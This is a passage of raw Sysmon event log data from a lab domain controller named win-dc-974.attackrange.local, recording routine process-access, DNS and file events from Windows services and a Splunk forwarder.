16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002239785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.241{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local54651- 354300x80000000000000002239898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56935- 354300x80000000000000002239897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.256{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local54651- 23542300x80000000000000002239896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.467{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=368B2E8B938BFD2E29D6C61C0F2F6F9D,SHA256=EC345B90B3379464BD68DF65568F18082E8CD61AB7C59BA5A1DD83BB06D817DE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.451{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DA2-603E-AFAA-00000000AD01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.451{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DA2-603E-AFAA-00000000AD01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.451{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DA2-603E-AFAA-00000000AD01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002239888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.453{05ADC7E1-6DA2-603E-AFAA-00000000AD01}9612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002239887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.451{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F894D9C20EE345FF8696D7B848E71920,SHA256=423DBFE0E6216FFA13414B90FD4BDBE462D93DDDC77C23DD6D0F66E42CD2DC1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:54.451{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=298AE4803F87050CF0308A4B68AEABDE,SHA256=82A8B0760AA184499EA43F34FA8FC9BB832F9744E776CCF12EB312144B6F6DE6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002239911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.491{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local56935- 10341000x80000000000000002239910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.514{05ADC7E1-6DA3-603E-B0AA-00000000AD01}101684156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002239909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.357{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8DA4AB2AA98735AFF8496DEA40F8E9C6,SHA256=5C190BC1DDEA137A8A1F2B81F1FE8AAF1CCB8A1130939406D097C23EE3DBFA9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.326{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D712406C5B57231722F8B349756BA3E,SHA256=4B0E4A9AD5C6756FA7CFFD69725D1352B7E70C6504356F1880F3CE00328E1ED9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.310{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68C1AA70727AAC60B2EDF1C196F26814,SHA256=6CEB5232D9F987DD660135E73955DFD7BAB5016E16305640C88AA7554C85805F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.310{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DA3-603E-B0AA-00000000AD01}10168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.310{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.310{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.310{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.310{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERN